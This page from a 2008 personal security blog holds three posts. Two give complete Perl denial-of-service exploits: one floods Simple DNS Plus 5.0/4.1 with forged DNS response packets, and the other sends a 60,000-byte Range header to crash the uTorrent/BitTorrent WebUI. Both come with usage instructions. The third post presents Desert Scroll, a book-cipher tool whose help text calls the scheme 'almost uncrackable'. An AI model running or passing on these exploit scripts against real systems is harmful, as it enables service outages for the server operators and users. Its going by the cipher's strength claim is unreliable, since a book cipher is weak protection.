Simple DNS Plus 5.0/4.1 remote Denial of Service exploit

Posted on July 12, 2008
Filed Under Exploits, Source code | 1 Comment

after reading the story about Dan kaminskys DNS cache posioning attack
and watching his ridiculous youtube cornflakes commercial
i decided to trace the source of this vulnerability.
so in order to understand how kaminsky attack is any diffrent from the traditional dns cache posioning
i started digging into some RFCs/documentations and playing with the protocol
to see if i can find some clues/logical faults.
yet i didnt find anything worthy and i wonder if kaminsky founding is just some algorithm of guessing a little bit faster the 16 bit transaction ID field

anyway while i was doing some tests on this Simple DNS server
i’ve found that if i repeatingly send DNS server response packets as if i was a root dns server
to the client port of the DNS server it will remotly cause a denial of service.

so what we have here is a DNS response packet built from scratch
that basicly flood the the source port of some “Simple DNS server Plus” and deny its service.
p.s: i used mutiple pack functions to make it more convenient
i could have just squeeze it into one pack but what the heck..

  1. #!/usr/bin/perl
  2. # Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit
  3. #
  4. # usage: sdns-dos.pl <dns server> <dns source port> <num of packets>
  5. # Exploit written by Exodus.
  6. # http://www.blackhat.org.il
  7.  
  8. use IO::Socket;
  9.  
  10. if(@ARGV < 3){
  11. print("sdns-dos.pl <dns server> <dns source port> <num of packets>");
  12. }
  13. $sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server");
  14.  
  15.  
  16.  
  17. $address = $ARGV[0];
  18.  
  19. $trans = pack("H4","1337");
  20. $flags = pack("B16","1000010110110000");
  21. $question = pack("H4","0001");
  22. $answerRR = pack("H4","0001");
  23. $authorityRR = pack("H4","0000");
  24. $additionlRR = pack("H4","0000");
  25. $type = pack("H4","0001"); # A host name
  26. $class = pack("H4","0001"); # IN
  27.  
  28. @parts = split(/\./,$address);
  29. foreach $part (@parts)
  30. {
  31.  $packedlen = pack("H2",sprintf("%02x",length($part)));
  32.  $address2 .= $packedlen.$part;
  33. }
  34. $query = $address2. "\000" . $type . $class;
  35.  
  36. $aname = pack("H4","c00c");
  37. $atype = pack("H4","0001");
  38. $aclass = pack("H4","0001");
  39. $ttl = pack("H8","0000008d");
  40. $dlen = pack("H4","0004");
  41. $addr = inet_aton("127.0.0.1");
  42. $answer = $aname . $atype . $aclass . $ttl . $dlen . $addr;
  43.  
  44. $payload = $trans . $flags . $question . $answerRR
  45. . $authorityRR . $additionlRR . $query . $answer;
  46.  
  47. print "sending $ARGV[2] packets… ";
  48. for($i=0;$i<=$ARGV[2];$i++)
  49. {
  50.  print $sock $payload;
  51. }
  52. print "Done. Good bye.";
  53. __END__

uTorrent / BitTorrent WebIU 1.7.7/6.0.1 Range header Denial of Service exploit

Posted on June 23, 2008
Filed Under Exploits, Source code | Leave a Comment

Today i kinda got really bored, so i’ve decided to dig into some advisories and see what i can find
during my search i’ve found the following advisory
and since i didnt have anything better to do and it doesnt require much of a thinking
i came up with the following exploit:

  1. #!/usr/bin/perl
  2. # uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit
  3. # according to the following advisory: http://secunia.com/advisories/30605
  4. #
  5. # usage: WebUI-dos.pl <url> <port> <user:pass>
  6. # Exploit written by Exodus.
  7. # http://www.blackhat.org.il
  8.  
  9. use IO::Socket;
  10. use MIME::Base64;
  11.  
  12. if(@ARGV < 3)
  13. { &usage; }
  14.  
  15. ($host,$ref) = split(/\//,$ARGV[0]);
  16.  
  17. $sock = IO::Socket::INET->new(PeerAddr => "$host:$ARGV[1]", Proto =>'TCP') || die("[X]Couldnt connect to host: $host:$ARGV[1]\n");
  18. $buff = "E" x 60000;
  19. $up = encode_base64($ARGV[2]);
  20. chomp($up);
  21.  
  22. print $sock "GET /gui/common.js HTTP/1.1\r\n".
  23. "Host: $host\r\n".
  24. "Authorization: Basic $up\r\n".
  25. "Range: bytes=$buff\r\n".
  26. "Connection: close\r\n\r\n";
  27.  
  28. close($sock);
  29.  
  30. print "[!]Payload sent, WebUI should be down…\n";
  31.  
  32.  
  33.  
  34. sub usage
  35. {
  36.  print "usage $0 <url> <port> <user:pass>\n".
  37.     "ex: $0 127.0.0.1/gui/common.js 1337 admin:admin\n";
  38.  exit;
  39. }

Desert Scroll cypher

Posted on June 22, 2008
Filed Under Cryptography, Projects, Source code | Leave a Comment

1. Overview:
Desert Scroll is an old project of mine which i wrote in perl couple of years ago
and basicly its an implementation of a Book encryption

2. How does it work:

2.1. Loading && Mapping the key file:
at first before every encryption/decryption of plain text a key is being loaded into the memory of the script/program and then mapped into a bi-dimensional array while the first dimension is used to map all ASCII numeric values that exists in the key and in the second dimension there are all the offsets of the same ASCII value which exists in the key file

2.2.Encrypting process:
the process of the encryption is basicly a replacment of the original characters in the plaintext with the one of the offsets which lays under that ASCII value in the array
its worth mentioning that no addition steps has been taken to camouflage and prevent from the third side to understand the mechanisem of this encryption

  1. perl Desert_Scroll-v1.0-recode.pl dec.txt mentor_crpyt.txt http://www.blackhat.org.il/uploads/hackermanifesto.txt -e
  2.  
  3. 836 1465 431 2199 253 848 1539 358 566 1350 733 25 930 1689 1009 2759 1645 1357 2695
  4. 143 469 278 395 74 106 2954 2661 3127 87 2775 922 2207 1876 2637 1794 2279 3098 103
  5. 48 801 1394 1190 1497 2055 3123 773 3140

2.3.Decrypting process:
the decrypting process is fairly simple the script replace every offest number with its identical value from the key map.

  1. perl Desert_Scroll-v1.0-recode.pl mentor_crpyt.txt mentor_dec.txt http://www.morcant.net/data/docs/Misc/hackermanifesto.txt -d
  2.  
  3. "imagination is more important than knowledge" - Albert Einstein

3.Notes:
- the code was written long time ago and if i’d be recoding it today i’m sure it could have been more efficient and optimized.
- some of the comments in the brief of the source code are a bit silly so you are more than welcome to ignore them.

use LWP::Simple;
  1. system('cls');
  2. print qq~;—————————————————————————–;
  3. ;Desert Scroll v1.0:                                Exodus/nullfield\@gmail.com;
  4. ;—————————————————————————–;
  5. [!]INPUT: Desert_Scroll-v1.0-recode.pl $ARGV[0] $ARGV[1] $ARGV[2] $ARGV[3]
  6. ~;
  7. if(@ARGV==1 &amp;&amp; @ARGV[0] eq "-h")
  8. {
  9. print qq~
  10.  DS is  a  encoding/decoding  tool  implementing the so called book-encryption
  11.  and   almost   uncrackable  unless  using  the  right  key.  what  makes this
  12.  encryption  so  uniqe  is that the key could be almost anything from the very
  13.  "Declaration  of  Independence"  to  the Mentors "The Conscience of a Hacker"
  14.  paper.
  15.  this  means  that  two  sides could first decide on a key-text which could be
  16.  some  famous paper on god knows what and after then they could start swiching
  17.  messages  without  any  concerns  that a  third side factor would disturb and
  18.  decode their data.                                                            
  19.  
  20.  another note that must be mentioned is that the bigger in size the key is the
  21.  stronger   and   tougher   to   crack   the  encryption  is.  however
  22.  there is still one basic disadvantage in this encryption, in  order to encode
  23.  any ascii  value the key  must contain it somewhere in it or else it wont get
  24.  encoded   or   in   order    words   some   of   the   data   will  get  lost
  25.  therefore it  is  better to use a large texts which would contain atleast the
  26.  most important ascii values to ensure a valid flow of encoded data.
  27.  DS  also contains a key generator that ensures a strong and  valid encryption
  28.  Use:
  29.  the defination  of the arguments of the encoder/decoder routines is using the
  30.  following syntax:
  31.  perl Desert_Scroll-v1.0-recode.pl     &lt;-e/-d&gt;
  32.  &lt;-e/-d&gt; -&gt; -e to encode, -d to decode.
  33.       -&gt; source text to encode/decode or a qouted text.
  34.      -&gt; destenation to output the resaults.
  35.       -&gt; I. a pointer to the key file
  36.               II. an interger to generate a key
  37.               III. an URL pointing on the key source(format: http://)
  38.  
  39.  You can also use the key-generator stand-alone features by using the
  40.  following synatx:
  41.  perl Desert_Scroll-v1.0-recode.pl &lt;-g&gt;
  42.   -&gt; key length.
  43.     -&gt; Destenation of the key file.
  44. ~;}
  45.  
  46. elsif(@ARGV[0] eq "-g")
  47. {
  48.  if(@ARGV!=3)
  49.  {
  50.   print qq~
  51. [!]in order to use the key generator function you must follow this syntax:
  52. [!] perl Desert_Scroll-v1.0-recode.pl -g
  53. [!]  -&gt; key length.
  54. [!]    -&gt; Destenation of the key file.
  55. ~;
  56.   exit;
  57.  }
  58.  print "\n[V]Generating key…\n";
  59.  $key=key_gen(@ARGV[1]);
  60.  print "[V]Key is being saved to @ARGV[2].\n";
  61.  save_file(@ARGV[2],$key);
  62.  print "[V]Key generation completed.\n";
  63. }
  64.  
  65. elsif(@ARGV!=3)
  66. {
  67.  print qq~
  68. [!]DS is using the following syntax:
  69. [!]Use: perl Desert_Scroll-v1.0-recode.pl    &lt;-e/-d&gt;
  70. [!]type "perl Desert_Scroll-v1.0-recode.pl -h" for fully specifications about DS.
  71.  
  72. ~;
  73. }
  74. if(@ARGV[3] eq "-e")
  75. {
  76.  
  77.  $file=file_content(@ARGV[0]);
  78.  $key=file_content(@ARGV[2]);
  79.  if(!$file)
  80.  {print"[!]Couldnt open source file therefore argument treated like a string.\n";}
  81.  $key_string=@ARGV[2];
  82.  if($key_string=~/http\:\/\//)
  83.  {
  84.   print "[!]Downloading the key from: $key_string\n";
  85.   $key=get($key_string);
  86.  }
  87.  elsif($key=file_content($key_string))
  88.  { print "[!]Opening the source of the key file.\n"; }
  89.  else
  90.  {
  91.   print "[!]Couldnt open Key-file therfore argument treated like a length interger.\n";
  92.   $key=key_gen($key_string);
  93.   save_file("[key]".@ARGV[0],$key);
  94.   print "[!]New Generated key has been saved to \"[key]@ARGV[0]\"\n";
  95.  }
  96.  key_map($key);
  97.  print "[V]Key mapped successfully in memory.\n";
  98.  save_file(@ARGV[1],encode($file));
  99.  print "[V]Encoded file is saved to \"@ARGV[1]\".\n";
  100.  print "[V]Encoding complete.\n";
  101.  close(DEST);
  102.  $e=;
  103. }
  104. elsif(@ARGV[3] eq "-d")
  105. {
  106.  $file=file_content(@ARGV[0]);
  107.  $key=file_content(@ARGV[2]);
  108.  if(!$file)
  109.  {print"[!]Couldnt open source file therefore argument treated like a string.\n"; }
  110.  if(@ARGV[2]=~/http\:\/\//)
  111.  {
  112.   print "[!]Downloading the key from: @ARGV[2]\n";
  113.   $key=get(@ARGV[2]);
  114.  }
  115.  elsif(!$key)
  116.  { print "[X]Could'nt Open the source key file, decoding process failed.\n";exit;}
  117.  print "[!]Opening the source of the key file.\n";
  118.  save_file(@ARGV[1],decode($file,$key));
  119.  print "[V]Decoded file is saved to \"@ARGV[1]\".\n";
  120.  print "[V]Decoding complete.\n";
  121.  close(DEST);
  122.  $e=;
  123.  
  124. }
  125.  
  126. sub file_content()
  127. {
  128.  my $content,$line;
  129.  my ($source)=@_;
  130.  open(FILE_CON,$source) || return 0;
  131.  while($line=) {$content.=$line;}
  132.  close(FILE_CON);
  133.  return $content;
  134. }
  135. sub save_file()
  136. {
  137.  my ($dest,$content)=@_;
  138.  if(!open(FILE_SAV,"&gt;$dest"))
  139.  { print("[X]Unable to open the file.\n"); }
  140.  print FILE_SAV $content;
  141.  close(FILE_SAV);
  142. }
  143.  
  144. sub key_gen()
  145. {
  146.  my ($len)=@_;
  147.  for($i=0; $i&lt;=$len;$i++)
  148.  {
  149.   $keytext.=$rnd_char=chr(rand(255));
  150.  }
  151.  return $keytext;
  152. }
  153.  
  154. sub encode
  155. {
  156.  my ($content)=@_;
  157.  $len=length($content);
  158.  for($i=0;$i&lt;=$len;$i++) # foreach letter
  159.  {
  160.   $num=ord(substr($content,$i,1));
  161.   if(@{$map[$num]})
  162.   {
  163.    $rand_var_alloc = $map[$num][int(rand(scalar(@{$map[$num]})))];
  164.    $encoded.="$rand_var_alloc ";
  165.   }
  166.   else { print "[X]the ASCII value $num doesnt exist in the key this might cause data loss..\n";}
  167.  }
  168.  return $encoded;
  169.  
  170. }
  171.  
  172. sub decode
  173. {
  174.  my @encoded,$num,$letter,$decoded;
  175.  my ($content,$key_src)=@_;
  176.  @encoded = split(/ /,$content);
  177.  foreach $num (@encoded)
  178.  {
  179.   $letter = substr($key_src,$num,1);
  180.   $decoded .= $letter;
  181.  }
  182.  return $decoded
  183.  
  184. }
  185.  
  186. sub key_map
  187. {
  188.  my ($content)=@_;
  189.  my $num,$i;
  190.  for($i=0;$i&lt;=length($content);$i++)
  191.  {
  192.   $num=ord(substr($content,$i,1));
  193.   push(@{$map[$num]},$i);
  194.  }
  195.  return(1);
  196. }
« go backkeep looking »